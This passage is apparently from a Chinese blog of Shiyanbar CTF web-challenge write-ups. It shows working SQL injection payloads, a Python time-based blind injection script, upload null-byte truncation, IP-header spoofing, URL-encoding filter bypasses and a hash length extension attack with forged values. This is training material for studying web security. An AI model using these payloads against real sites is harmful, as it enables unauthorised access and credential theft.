&apos;p.&apos;) !== FALSE)&#123;</span><br><span class="line">    $flag = &quot;&quot;;</span><br><span class="line">    $stop = 6;        //Not Pass</span><br><span class="line">&#125;</span><br><span class="line"></span><br><span class="line">//第七，现在是最关键的时刻</span><br><span class="line">//你的$URL必须与/indirection/index.php有所不同</span><br><span class="line">if($flag &amp;&amp; $URL == &apos;/indirection/index.php&apos;)&#123;</span><br><span class="line">    $flag = &quot;&quot;;</span><br><span class="line">    $stop = 7;        //Not Pass</span><br><span class="line">&#125;</span><br><span class="line">if(!$stop) $stop = 8;</span><br><span class="line"></span><br><span class="line">echo &apos;Flag: &apos;.$flag;</span><br><span class="line">echo &apos;&lt;hr /&gt;&apos;;</span><br><span class="line">for($i = 1; $i &lt; $stop; $i++)</span><br><span class="line">    $code = str_replace(&apos;//Pass &apos;.$i, &apos;//Pass&apos;, $code);</span><br><span class="line">for(; $i &lt; 8; $i++)</span><br><span class="line">    $code = str_replace(&apos;//Pass &apos;.$i, &apos;//Not Pass&apos;, $code);</span><br><span class="line"></span><br><span class="line"></span><br><span class="line">echo highlight_string($code, TRUE);</span><br><span class="line"></span><br><span class="line">echo &apos;&lt;/body&gt;&lt;/html&gt;&apos;;</span><br></pre></td></tr></table></figure>
</li>
<li><p>题目的意思时访问index.php得到flag，但是</p>
</li>
</ul>
<ol>
<li>不得出现 ./</li>
<li>不得出现 ../</li>
<li>可以用的字符做了限制，a-z / 和 .</li>
<li>不得出现 //</li>
<li>必须包含/index.php，并且以此结尾</li>
<li>禁止p后面出现.这个符号</li>
<li>你的$URL必须与/indirection/index.php有所不同</li>
</ol>
<ul>
<li>url伪静态技术，使用<a href="http://ctf5.shiyanbar.com/indirection/index.php/index/index.php" target="_blank" rel="noopener">http://ctf5.shiyanbar.com/indirection/index.php/index/index.php</a></li>
<li>index.php后的index.php会被当做参数处理，所以服务器只会解析第一个index.php，满足条件成功绕过。</li>
<li>URL重写，其实就是把带一大堆参数的url，变成一个看上去很规矩的url,主要目的是为了搜索引擎。</li>
</ul>
<h2 id="实验吧-php大法"><a href="#实验吧-php大法" class="headerlink" title="实验吧 php大法"></a>实验吧 php大法</h2><ul>
<li><p>解题链接： <a href="http://ctf5.shiyanbar.com/DUTCTF/index.php" target="_blank" rel="noopener">http://ctf5.shiyanbar.com/DUTCTF/index.php</a></p>
</li>
<li><p>打开链接有提示</p>
</li>
<li><blockquote>
<p>Can you authenticate to this website? index.php.txt</p>
</blockquote>
</li>
<li><p>打开提示的txt文档，出现了源码</p>
<figure class="highlight plain"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br><span class="line">4</span><br><span class="line">5</span><br><span class="line">6</span><br><span class="line">7</span><br><span class="line">8</span><br><span class="line">9</span><br><span class="line">10</span><br><span class="line">11</span><br><span class="line">12</span><br><span class="line">13</span><br></pre></td><td class="code"><pre><span class="line">&lt;?php</span><br><span class="line">if(eregi(&quot;hackerDJ&quot;,$_GET[id])) &#123;</span><br><span class="line">  echo(&quot;&lt;p&gt;not allowed!&lt;/p&gt;&quot;);</span><br><span class="line">  exit();</span><br><span class="line">&#125;</span><br><span class="line"></span><br><span class="line">$_GET[id] = urldecode($_GET[id]);</span><br><span class="line">if($_GET[id] == &quot;hackerDJ&quot;)</span><br><span class="line">&#123;</span><br><span class="line">  echo &quot;&lt;p&gt;Access granted!&lt;/p&gt;&quot;;</span><br><span class="line">  echo &quot;&lt;p&gt;flag: *****************&#125; &lt;/p&gt;&quot;;</span><br><span class="line">&#125;</span><br><span class="line">?&gt;</span><br></pre></td></tr></table></figure>
</li>
<li><p>分析代码，id的值不能和hackerDJ相同，并且id经url解码为hackerDJ</p>
</li>
<li><p>把hackerDJ进行url编码，得到%68%61%63%6b%65%72%44%4a</p>
</li>
<li><p>构造url：index.php?id=%68%61%63%6b%65%72%44%4a,显示not allowed</p>
</li>
<li><p>这里需要注意的是：在浏览器中提交时浏览器会为我们进行一次解码</p>
</li>
<li><p>再一次url编码，得到%2568%2561%2563%256b%2565%2572%2544%254a</p>
</li>
<li><p>构造url：index.php?id=%2568%2561%2563%256b%2565%2572%2544%254a,得到flag</p>
</li>
</ul>
<h2 id="实验吧-NSCTF-web200"><a href="#实验吧-NSCTF-web200" class="headerlink" title="实验吧 NSCTF web200"></a>实验吧 NSCTF web200</h2><ul>
<li>解题链接： <a href="http://ctf5.shiyanbar.com/web/web200.jpg" target="_blank" rel="noopener">http://ctf5.shiyanbar.com/web/web200.jpg</a></li>
<li>链接是张图片，题目意思是按照加密的源码解出密文</li>
<li><img src="http://ctf5.shiyanbar.com/web/web200.jpg" alt="image"></li>
<li>strrev() 函数：反转字符串</li>
<li>substr() 函数：substr() 函数返回字符串的一部分。substr(string,start,length)</li>
<li>ord()和chr()分别是返回字符的asc码值和从asc码值返回字符</li>
<li>分析代码：先把字符串反转，然后每个字符的asc码加一，取其对应的字符，进行base64编码，反转字符串，最后rot13加密</li>
<li>只要逆序解密，就能得到flag</li>
<li>a1zLbgQsCESEIqRLwuQAyMwLyq2L5VwBxqGA3RQAyumZ0tmMvSGM2ZwB4tws</li>
<li>–&gt;rot13解码：<br>n1mYotDfPRFRVdEYjhDNlZjYld2Y5IjOkdTN3EDNlhzM0gzZiFTZ2MjO4gjf</li>
<li>–&gt;reverse:<br>fjg4OjM2ZTFiZzg0MzhlNDE3NTdkOjI5Y2dlYjZlNDhjYEdVRFRPfDtoYm1n</li>
<li>–&gt;base64解码：<br>~88:36e1bg8438e41757d:29cgeb6e48c`GUDTO|;hbmg</li>
<li>–&gt;python<figure class="highlight plain"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br><span class="line">4</span><br><span class="line">5</span><br><span class="line">6</span><br></pre></td><td class="code"><pre><span class="line">data= &apos;~88:36e1bg8438e41757d:29cgeb6e48c`GUDTO|;hbmg&apos;</span><br><span class="line">result=&apos;&apos;</span><br><span class="line">for i in data:</span><br><span class="line">    result += chr(ord(i)-1)</span><br><span class="line">result = result[::-1]</span><br><span class="line">print result</span><br></pre></td></tr></table></figure>

</li>
</ul>
<p>得到flag</p>
<h2 id="实验吧-上传绕过"><a href="#实验吧-上传绕过" class="headerlink" title="实验吧 上传绕过"></a>实验吧 上传绕过</h2><ul>
<li><p>解题链接： <a href="http://ctf5.shiyanbar.com/web/upload" target="_blank" rel="noopener">http://ctf5.shiyanbar.com/web/upload</a></p>
</li>
<li><p>先上传jpg文件，返回页面要求后缀名为php</p>
</li>
<li><p>上传php文件，要求必须传jpg等图片文件</p>
</li>
<li><p>这个时候就想到用0x00截断</p>
</li>
<li><p>上传一张图片，将数据包发到repeater,在/uploads/后面加上一个1.php+ 然后发送到repeater 用十六进制打开 找到+所在的位置把+的十六进制2b改为00</p>
</li>
<li><p>简单举个例子：</p>
<figure class="highlight plain"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br></pre></td><td class="code"><pre><span class="line">path=&quot;upfiles/picture/&quot;</span><br><span class="line">file=&quot;20121212.jpg&quot;</span><br><span class="line">upfilename=path &amp; file &apos;最后的上传地址</span><br></pre></td></tr></table></figure>
</li>
<li><p>upfilename即为最终名字，意思为如果地址为picture/1.php+,文件名为1.jpg则最终上传上去的文件路径为picture/1.php+1.jpg，0x00截断的思路即为将+之后的内容忽略掉使上传文件1.jpg最终上传到1.php中，此处利用到的就是0x00的截断漏洞</p>
</li>
</ul>
<h2 id="实验吧-这个看起来有点简单"><a href="#实验吧-这个看起来有点简单" class="headerlink" title="实验吧 这个看起来有点简单!"></a>实验吧 这个看起来有点简单!</h2><ul>
<li>解题链接： <a href="http://ctf5.shiyanbar.com/8/index.php?id=1" target="_blank" rel="noopener">http://ctf5.shiyanbar.com/8/index.php?id=1</a></li>
<li>sql注入题，没有过滤</li>
<li>使用sqlmap，Database: my_db,Table: thiskey,k0y:whatiMyD91dump</li>
</ul>
<h2 id="实验吧-貌似有点难"><a href="#实验吧-貌似有点难" class="headerlink" title="实验吧 貌似有点难"></a>实验吧 貌似有点难</h2><ul>
<li><p>解题链接： <a href="http://ctf5.shiyanbar.com/phpaudit/" target="_blank" rel="noopener">http://ctf5.shiyanbar.com/phpaudit/</a></p>
</li>
<li><p>PHP代码审计</p>
</li>
<li><p>打开链接提示“错误！你的IP不在允许列表之内！” 并且有源码</p>
<figure class="highlight plain"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br><span class="line">4</span><br><span class="line">5</span><br><span class="line">6</span><br><span class="line">7</span><br><span class="line">8</span><br><span class="line">9</span><br><span class="line">10</span><br><span class="line">11</span><br><span class="line">12</span><br><span class="line">13</span><br><span class="line">14</span><br><span class="line">15</span><br><span class="line">16</span><br><span class="line">17</span><br><span class="line">18</span><br><span class="line">19</span><br><span class="line">20</span><br><span class="line">21</span><br></pre></td><td class="code"><pre><span class="line">&lt;?php</span><br><span class="line">function GetIP()&#123;</span><br><span class="line">if(!empty($_SERVER[&quot;HTTP_CLIENT_IP&quot;]))</span><br><span class="line">	$cip = $_SERVER[&quot;HTTP_CLIENT_IP&quot;];</span><br><span class="line">else if(!empty($_SERVER[&quot;HTTP_X_FORWARDED_FOR&quot;]))</span><br><span class="line">	$cip = $_SERVER[&quot;HTTP_X_FORWARDED_FOR&quot;];</span><br><span class="line">else if(!empty($_SERVER[&quot;REMOTE_ADDR&quot;]))</span><br><span class="line">	$cip = $_SERVER[&quot;REMOTE_ADDR&quot;];</span><br><span class="line">else</span><br><span class="line">	$cip = &quot;0.0.0.0&quot;;</span><br><span class="line">return $cip;</span><br><span class="line">&#125;</span><br><span class="line"></span><br><span class="line">$GetIPs = GetIP();</span><br><span class="line">if ($GetIPs==&quot;1.1.1.1&quot;)&#123;</span><br><span class="line">echo &quot;Great! Key is *********&quot;;</span><br><span class="line">&#125;</span><br><span class="line">else&#123;</span><br><span class="line">echo &quot;错误！你的IP不在访问列表之内！&quot;;</span><br><span class="line">&#125;</span><br><span class="line">?&gt;</span><br></pre></td></tr></table></figure>
</li>
<li><p>分析代码</p>
</li>
</ul>
<ol>
<li>首先检测是HTTP_CLIENT_IP，它对应的是header中的client-ip，所在头文件中设置client-ip:1.1.1.1，可以得到flag</li>
<li>然后检测HTTP_X_FORWARDED_FOR，改X-forwarded-for为1.1.1.1可以得到flag</li>
<li>最后检测remote_addr，属于TCP/IP的网络层中的东西很难改</li>
</ol>
<h2 id="实验吧-简单的sql注入"><a href="#实验吧-简单的sql注入" class="headerlink" title="实验吧 简单的sql注入"></a>实验吧 简单的sql注入</h2><ul>
<li>提交1，链接变为id=1</li>
<li>提交1’,报错，存在注入</li>
<li>尝试?id=1 select order by union databse() columns tables</li>
<li><img src="https://s1.ax1x.com/2018/04/06/CCynAI.png" alt="CCynAI.png"></li>
<li>发现select，union等被过滤</li>
<li>尝试双写 selectselect  orderorder  byby  unionunion databse() columns tabes</li>
<li>发现可以绕过</li>
<li><img src="https://s1.ax1x.com/2018/04/06/CCyeHA.png" alt="CCyeHA.png"></li>
<li>查表</li>
<li>1’  unionunion  selectselect  table_name  fromfrom  information_schema.tables  wherewhere  ‘1’=’1</li>
<li>发现一个flag表<img src="https://s1.ax1x.com/2018/04/06/CCyuNt.png" alt="CCyuNt.png"></li>
<li>查列</li>
<li>1’ unionunion  selectselect  column_namcolumn_namee  fromfrom  information_schema.coluinformation_schema.columnsmns  wherewhere  table_name=’flag</li>
<li>这里information_schema.columns被替换成空格，需要绕过</li>
<li><img src="https://s1.ax1x.com/2018/04/06/CCyZBd.png" alt="CCyZBd.png"></li>
<li>发现flag列</li>
<li>最后1’  unionunion  selectselect  flag  fromfrom  flag  wherewhere  ‘1’=’1</li>
<li>得到flag</li>
<li><img src="https://s1.ax1x.com/2018/04/06/CCyVnH.png" alt="CCyVnH.png"></li>
</ul>
<h2 id="实验吧-看起来有点难"><a href="#实验吧-看起来有点难" class="headerlink" title="实验吧 看起来有点难"></a>实验吧 看起来有点难</h2><ul>
<li>尝试输入用户名和密码，发现只有用户名为admin是提示登录失败，错误的用户名和密码，其他情况提示数据库连接失败，猜想为盲注</li>
<li>构造?admin=admin’ and sleep(10) and ‘’=’&amp;pass=1&amp;action=login</li>
<li>能发现有明显的延迟，说明存在盲注</li>
<li>然后。。上sqlmap</li>
<li>附上别人的脚本<figure class="highlight plain"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br><span class="line">4</span><br><span class="line">5</span><br><span class="line">6</span><br><span class="line">7</span><br><span class="line">8</span><br><span class="line">9</span><br><span class="line">10</span><br><span class="line">11</span><br><span class="line">12</span><br><span class="line">13</span><br><span class="line">14</span><br><span class="line">15</span><br><span class="line">16</span><br><span class="line">17</span><br><span class="line">18</span><br><span class="line">19</span><br><span class="line">20</span><br><span class="line">21</span><br><span class="line">22</span><br><span class="line">23</span><br><span class="line">24</span><br><span class="line">25</span><br><span class="line">26</span><br><span class="line">27</span><br><span class="line">28</span><br><span class="line">29</span><br><span class="line">30</span><br><span class="line">31</span><br><span class="line">32</span><br><span class="line">33</span><br></pre></td><td class="code"><pre><span class="line">#-*-coding:utf-8-*-</span><br><span class="line">import requests</span><br><span class="line">import time</span><br><span class="line"></span><br><span class="line">payloads = &apos;abcdefghijklmnopqrstuvwxyz0123456789@_.&#123;&#125;*&apos;  #不区分大小写的</span><br><span class="line"></span><br><span class="line">flag = &quot;&quot;</span><br><span class="line">key=0</span><br><span class="line">print(&quot;Start&quot;)</span><br><span class="line">for i in range(1,50):</span><br><span class="line">    if key == 1:</span><br><span class="line">        break</span><br><span class="line">    for payload in payloads:</span><br><span class="line">        starttime = time.time()#记录当前时间</span><br><span class="line">        headers = &#123;&quot;Host&quot;: &quot;ctf5.shiyanbar.com&quot;,</span><br><span class="line">                   &quot;User-Agent&quot;: &quot;Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/59.0.3071.115 Safari/537.36&quot;,</span><br><span class="line">                   &quot;Accept&quot;: &quot;text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8&quot;,</span><br><span class="line">                   &quot;Accept-Language&quot;: &quot;zh-CN,zh;q=0.8,en-US;q=0.5,en;q=0.3&quot;,</span><br><span class="line">                   &quot;Accept-Encoding&quot;: &quot;gzip, deflate&quot;,</span><br><span class="line">                   &quot;Cookie&quot;: &quot;Hm_lvt_34d6f7353ab0915a4c582e4516dffbc3=1470994390,1470994954,1470995086,1471487815; Hm_cv_34d6f7353ab0915a4c582e4516dffbc3=1*visitor*67928%2CnickName%3Ayour&quot;,</span><br><span class="line">                   &quot;Connection&quot;: &quot;keep-alive&quot;,</span><br><span class="line">                   &#125;</span><br><span class="line">        url = &quot;http://ctf5.shiyanbar.com/basic/inject/index.php?admin=admin&apos; and case when(substr(password,%s,1)=&apos;%s&apos;) then sleep(10) else sleep(0) end and &apos;&apos;=&apos;&amp;pass=&amp;action=login&quot; %(i,payload)#数据库</span><br><span class="line">        res = requests.get(url, headers=headers)</span><br><span class="line">        if time.time() - starttime &gt; 10:</span><br><span class="line">            flag += payload</span><br><span class="line">            print(&quot;pwd is:%s&quot;%flag)</span><br><span class="line">            break</span><br><span class="line">        else:</span><br><span class="line">            if payload == &apos;*&apos;:</span><br><span class="line">                key = 1</span><br><span class="line">                break</span><br><span class="line">print(&apos;[Finally] current pwd is %s&apos;% flag)</span><br></pre></td></tr></table></figure>

</li>
</ul>
<h2 id="实验吧-忘记密码了"><a href="#实验吧-忘记密码了" class="headerlink" title="实验吧 忘记密码了"></a>实验吧 忘记密码了</h2><ul>
<li><p>打开随便输入email，<img src="https://s1.ax1x.com/2018/04/07/CPZzpF.png" alt="CPZzpF.png">弹窗提示一个链接<img src="https://s1.ax1x.com/2018/04/07/CPep6J.png" alt="CPep6J.png"></p>
</li>
<li><p>打开./step2.php?email=youmail@mail.com&amp;check=???????，又跳回到step1.php</p>
</li>
<li><p>有burp拦截下，发现有个submit.php的页面<img src="https://s1.ax1x.com/2018/04/07/CPe9X9.png" alt="CPe9X9.png"></p>
</li>
<li><p>打开submit.php，提示不是admin</p>
</li>
<li><p>在step1的页面源代码有提示，使用vim编辑<img src="https://s1.ax1x.com/2018/04/07/CPeSl4.png" alt="CPeSl4.png"></p>
</li>
<li><p>关于vim的集中备份文件</p>
<ol>
<li>Vim 的交换文件 .filename.swp   默认交换文件在打开文件的时候就会产生交换文件，正常退出的时候才会删除交换文件</li>
<li>Vim 的备份文件 filename~ 开启后，对文件进行修改后会保存修改之前的一个副本</li>
<li>undo 备份文件 .filename.un.~</li>
</ol>
</li>
<li><p>发现存在.submit.php.swp</p>
<figure class="highlight plain"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br><span class="line">4</span><br><span class="line">5</span><br><span class="line">6</span><br><span class="line">7</span><br><span class="line">8</span><br><span class="line">9</span><br><span class="line">10</span><br><span class="line">11</span><br><span class="line">12</span><br><span class="line">13</span><br><span class="line">14</span><br><span class="line">15</span><br><span class="line">16</span><br><span class="line">17</span><br><span class="line">18</span><br><span class="line">19</span><br><span class="line">20</span><br><span class="line">21</span><br><span class="line">22</span><br><span class="line">23</span><br><span class="line">24</span><br><span class="line">25</span><br><span class="line">26</span><br><span class="line">27</span><br><span class="line">28</span><br><span class="line">29</span><br><span class="line">30</span><br><span class="line">31</span><br><span class="line">32</span><br><span class="line">33</span><br><span class="line">34</span><br><span class="line">35</span><br><span class="line">36</span><br><span class="line">37</span><br><span class="line">38</span><br><span class="line">39</span><br><span class="line">40</span><br><span class="line">41</span><br><span class="line">42</span><br><span class="line">43</span><br></pre></td><td class="code"><pre><span class="line"></span><br><span class="line">........这一行是省略的代码........</span><br><span class="line"></span><br><span class="line">/*</span><br><span class="line">如果登录邮箱地址不是管理员则 die()</span><br><span class="line">数据库结构</span><br><span class="line"></span><br><span class="line">--</span><br><span class="line">-- 表的结构 `user`</span><br><span class="line">--</span><br><span class="line"></span><br><span class="line">CREATE TABLE IF NOT EXISTS `user` (</span><br><span class="line">  `id` int(11) NOT NULL AUTO_INCREMENT,</span><br><span class="line">  `username` varchar(255) NOT NULL,</span><br><span class="line">  `email` varchar(255) NOT NULL,</span><br><span class="line">  `token` int(255) NOT NULL DEFAULT &apos;0&apos;,</span><br><span class="line">  PRIMARY KEY (`id`)</span><br><span class="line">) ENGINE=MyISAM  DEFAULT CHARSET=utf8 AUTO_INCREMENT=2 ;</span><br><span class="line"></span><br><span class="line">--</span><br><span class="line">-- 转存表中的数据 `user`</span><br><span class="line">--</span><br><span class="line"></span><br><span class="line">INSERT INTO `user` (`id`, `username`, `email`, `token`) VALUES</span><br><span class="line">(1, &apos;****不可见***&apos;, &apos;***不可见***&apos;, 0);</span><br><span class="line">*/</span><br><span class="line"></span><br><span class="line"></span><br><span class="line">........这一行是省略的代码........</span><br><span class="line"></span><br><span class="line">if(!empty($token)&amp;&amp;!empty($emailAddress))&#123;</span><br><span class="line">	if(strlen($token)!=10) die(&apos;fail&apos;);</span><br><span class="line">	if($token!=&apos;0&apos;) die(&apos;fail&apos;);</span><br><span class="line">	$sql = &quot;SELECT count(*) as num from `user` where token=&apos;$token&apos; AND email=&apos;$emailAddress&apos;&quot;;</span><br><span class="line">	$r = mysql_query($sql) or die(&apos;db error&apos;);</span><br><span class="line">	$r = mysql_fetch_assoc($r);</span><br><span class="line">	$r = $r[&apos;num&apos;];</span><br><span class="line">	if($r&gt;0)&#123;</span><br><span class="line">		echo $flag;</span><br><span class="line">	&#125;else&#123;</span><br><span class="line">		echo &quot;失败了呀&quot;;</span><br><span class="line">	&#125;</span><br><span class="line">&#125;</span><br></pre></td></tr></table></figure>
</li>
<li><p>分析代码，需要token为0且长度为10，还需要正确的管理员邮箱，其实就在step1的源代码里</p>
</li>
</ul>
<h2 id="实验吧-程序逻辑问题"><a href="#实验吧-程序逻辑问题" class="headerlink" title="实验吧 程序逻辑问题"></a>实验吧 程序逻辑问题</h2><ul>
<li>查看页面源代码，发现 <code>&lt;a href=&quot;index.txt&quot;&gt;</code></li>
<li>点开后出现源码</li>
</ul>
<figure class="highlight plain"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br><span class="line">4</span><br><span class="line">5</span><br><span class="line">6</span><br><span class="line">7</span><br><span class="line">8</span><br><span class="line">9</span><br><span class="line">10</span><br><span class="line">11</span><br><span class="line">12</span><br><span class="line">13</span><br><span class="line">14</span><br><span class="line">15</span><br><span class="line">16</span><br><span class="line">17</span><br><span class="line">18</span><br><span class="line">19</span><br><span class="line">20</span><br><span class="line">21</span><br><span class="line">22</span><br><span class="line">23</span><br><span class="line">24</span><br><span class="line">25</span><br><span class="line">26</span><br><span class="line">27</span><br><span class="line">28</span><br><span class="line">29</span><br><span class="line">30</span><br><span class="line">31</span><br><span class="line">32</span><br><span class="line">33</span><br><span class="line">34</span><br><span class="line">35</span><br><span class="line">36</span><br><span class="line">37</span><br><span class="line">38</span><br><span class="line">39</span><br><span class="line">40</span><br><span class="line">41</span><br><span class="line">42</span><br><span class="line">43</span><br><span class="line">44</span><br><span class="line">45</span><br><span class="line">46</span><br></pre></td><td class="code"><pre><span class="line">&lt;html&gt;</span><br><span class="line">&lt;head&gt;</span><br><span class="line">welcome to simplexue</span><br><span class="line">&lt;/head&gt;</span><br><span class="line">&lt;body&gt;</span><br><span class="line">&lt;?php</span><br><span class="line"></span><br><span class="line"></span><br><span class="line">if($_POST[user] &amp;&amp; $_POST[pass]) &#123;</span><br><span class="line">	$conn = mysql_connect(&quot;********, &quot;*****&quot;, &quot;********&quot;);</span><br><span class="line">	mysql_select_db(&quot;phpformysql&quot;) or die(&quot;Could not select database&quot;);</span><br><span class="line">	if ($conn-&gt;connect_error) &#123;</span><br><span class="line">		die(&quot;Connection failed: &quot; . mysql_error($conn));</span><br><span class="line">&#125;</span><br><span class="line">$user = $_POST[user];</span><br><span class="line">$pass = md5($_POST[pass]);</span><br><span class="line"></span><br><span class="line">$sql = &quot;select pw from php where user=&apos;$user&apos;&quot;;</span><br><span class="line">$query = mysql_query($sql);</span><br><span class="line">if (!$query) &#123;</span><br><span class="line">	printf(&quot;Error: %s\n&quot;, mysql_error($conn));</span><br><span class="line">	exit();</span><br><span class="line">&#125;</span><br><span class="line">$row = mysql_fetch_array($query, MYSQL_ASSOC);</span><br><span class="line">//echo $row[&quot;pw&quot;];</span><br><span class="line"></span><br><span class="line">  if (($row[pw]) &amp;&amp; (!strcasecmp($pass, $row[pw]))) &#123;</span><br><span class="line">	echo &quot;&lt;p&gt;Logged in! Key:************** &lt;/p&gt;&quot;;</span><br><span class="line">&#125;</span><br><span class="line">else &#123;</span><br><span class="line">    echo(&quot;&lt;p&gt;Log in failure!&lt;/p&gt;&quot;);</span><br><span class="line"></span><br><span class="line">  &#125;</span><br><span class="line"></span><br><span class="line"></span><br><span class="line">&#125;</span><br><span class="line"></span><br><span class="line">?&gt;</span><br><span class="line">&lt;form method=post action=index.php&gt;</span><br><span class="line">&lt;input type=text name=user value=&quot;Username&quot;&gt;</span><br><span class="line">&lt;input type=password name=pass value=&quot;Password&quot;&gt;</span><br><span class="line">&lt;input type=submit&gt;</span><br><span class="line">&lt;/form&gt;</span><br><span class="line">&lt;/body&gt;</span><br><span class="line">&lt;a href=&quot;index.txt&quot;&gt;</span><br><span class="line">&lt;/html&gt;</span><br></pre></td></tr></table></figure>

<ul>
<li>分析代码，需要MD5加密的pass与查询得到的数据一样</li>
<li>构造user=’ union select md5(1) #</li>
<li>pass=1</li>
<li>sql语句为select pw from php where user=’’ union select md5(1) #</li>
<li>得到flag</li>
</ul>
<h2 id="实验吧-让我进去"><a href="#实验吧-让我进去" class="headerlink" title="实验吧 让我进去"></a>实验吧 让我进去</h2><ul>
<li><p>查看cookie，把source值改为1，出现源代码</p>
<figure class="highlight plain"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br><span class="line">4</span><br><span class="line">5</span><br><span class="line">6</span><br><span class="line">7</span><br><span class="line">8</span><br><span class="line">9</span><br><span class="line">10</span><br><span class="line">11</span><br><span class="line">12</span><br><span class="line">13</span><br><span class="line">14</span><br><span class="line">15</span><br><span class="line">16</span><br><span class="line">17</span><br><span class="line">18</span><br><span class="line">19</span><br><span class="line">20</span><br><span class="line">21</span><br><span class="line">22</span><br><span class="line">23</span><br><span class="line">24</span><br><span class="line">25</span><br><span class="line">26</span><br><span class="line">27</span><br><span class="line">28</span><br><span class="line">29</span><br><span class="line">30</span><br><span class="line">31</span><br></pre></td><td class="code"><pre><span class="line">$flag = &quot;XXXXXXXXXXXXXXXXXXXXXXX&quot;;</span><br><span class="line">$secret = &quot;XXXXXXXXXXXXXXX&quot;; // This secret is 15 characters long for security!</span><br><span class="line"></span><br><span class="line">$username = $_POST[&quot;username&quot;];</span><br><span class="line">$password = $_POST[&quot;password&quot;];</span><br><span class="line"></span><br><span class="line">if (!empty($_COOKIE[&quot;getmein&quot;])) &#123;</span><br><span class="line">    if (urldecode($username) === &quot;admin&quot; &amp;&amp; urldecode($password) != &quot;admin&quot;) &#123;</span><br><span class="line">        if ($COOKIE[&quot;getmein&quot;] === md5($secret . urldecode($username . $password))) &#123;</span><br><span class="line">            echo &quot;Congratulations! You are a registered user.\n&quot;;</span><br><span class="line">            die (&quot;The flag is &quot;. $flag);</span><br><span class="line">        &#125;</span><br><span class="line">        else &#123;</span><br><span class="line">            die (&quot;Your cookies don&apos;t match up! STOP HACKING THIS SITE.&quot;);</span><br><span class="line">        &#125;</span><br><span class="line">    &#125;</span><br><span class="line">    else &#123;</span><br><span class="line">        die (&quot;You are not an admin! LEAVE.&quot;);</span><br><span class="line">    &#125;</span><br><span class="line">&#125;</span><br><span class="line"></span><br><span class="line">setcookie(&quot;sample-hash&quot;, md5($secret . urldecode(&quot;admin&quot; . &quot;admin&quot;)), time() + (60 * 60 * 24 * 7));</span><br><span class="line"></span><br><span class="line">if (empty($_COOKIE[&quot;source&quot;])) &#123;</span><br><span class="line">    setcookie(&quot;source&quot;, 0, time() + (60 * 60 * 24 * 7));</span><br><span class="line">&#125;</span><br><span class="line">else &#123;</span><br><span class="line">    if ($_COOKIE[&quot;source&quot;] != 0) &#123;</span><br><span class="line">        echo &quot;&quot;; // This source code is outputted here</span><br><span class="line">    &#125;</span><br><span class="line">&#125;</span><br></pre></td></tr></table></figure>
</li>
<li><p>分析代码</p>
<ol>
<li>cookie中getmein不能为空</li>
<li>username为admin，password不为admin</li>
<li>$COOKIE[“getmein”] === md5($secret . urldecode($username . $password)</li>
</ol>
</li>
<li><p>还给出了sample-hash<br>setcookie(“sample-hash”, md5($secret . urldecode(“admin” . “admin”))</p>
</li>
<li><p>这里哈希长度扩展攻击</p>
<blockquote>
<p>如果一个应用程序是这样操作的：准备了一个密文和一些数据构造成一个字符串里，并且使用了MD5之类的哈希函数生成了一个哈希值（也就是所谓的signature/签名）<br>  让攻击者可以提交数据以及哈希值，虽然攻击者不知道密文<br>  服务器把提交的数据跟密文构造成字符串，并经过哈希后判断是否等同于提交上来的哈希值<br>这个时候，该应用程序就易受长度扩展攻击，攻击者可以构造出{secret || data || attacker_controlled_data}的哈希值。</p>
</blockquote>
</li>
<li><p>$secret是密文，长度为15，如果再算上后面第一个admin，长度就是20<br>而数据是admin<br>签名（哈希值）是571580b26c65f306376d4f64e53cb5c7</p>
</li>
<li><p>使用HashPump，附加数据至少1位以上：</p>
<figure class="highlight plain"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br><span class="line">4</span><br><span class="line">5</span><br></pre></td><td class="code"><pre><span class="line"># hashpump</span><br><span class="line">Input Signature: 571580b26c65f306376d4f64e53cb5c7</span><br><span class="line">Input Data: admin</span><br><span class="line">Input Key Length: 20</span><br><span class="line">Input Data to Add: pcat</span><br></pre></td></tr></table></figure>

</li>
</ul>
<p>或者直接</p>
<p>hashpump -s 571580b26c65f306376d4f64e53cb5c7 -d admin -k 20 -a pcat</p>
<p>就会得到</p>
<p>3e67e8f0c05e1ad68020df30bbc505f5<br>admin\x80\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\xc8\x00\x00\x00\x00\x00\x00\x00pcat</p>
<p>第一个是新的签名，把它设置到cookies的getmein里。</p>
<p>第二个先把\x替换为%后，post提交</p>
<p>password=admin%80%00%00%00%00%00%00%00%00%00%00%00%00%00%00%00%00%00%00%00%00%00%00%00%00%00%00%00%00%00%00%c8%00%00%00%00%00%00%00pcat</p>
<h2 id="实验吧-登陆一下好吗"><a href="#实验吧-登陆一下好吗" class="headerlink" title="实验吧 登陆一下好吗"></a>实验吧 登陆一下好吗</h2><ul>
<li><p>猜测后台的sql应该是</p>
<figure class="highlight plain"><table><tr><td class="gutter"><pre><span class="line">1</span><br></pre></td><td class="code"><pre><span class="line">select * from table where username= &apos;username&apos; and password=&apos;password&apos;</span><br></pre></td></tr></table></figure>
</li>
<li><p>进过测试，发现过滤了以下字符 | , – , or , union , # , select ,* ,/</p>
</li>
</ul>
<ol>
<li>username= 1’=’0&amp;password= 1’=’0 ,sql语句为<figure class="highlight plain"><table><tr><td class="gutter"><pre><span class="line">1</span><br></pre></td><td class="code"><pre><span class="line">select * from table where username= &apos;1&apos;=&apos;0&apos; and password=&apos;1&apos;=&apos;0&apos;</span><br></pre></td></tr></table></figure>

</li>
</ol>
<p>username=’1’返回值为0，0=’0’，成立</p>
<ol start="2">
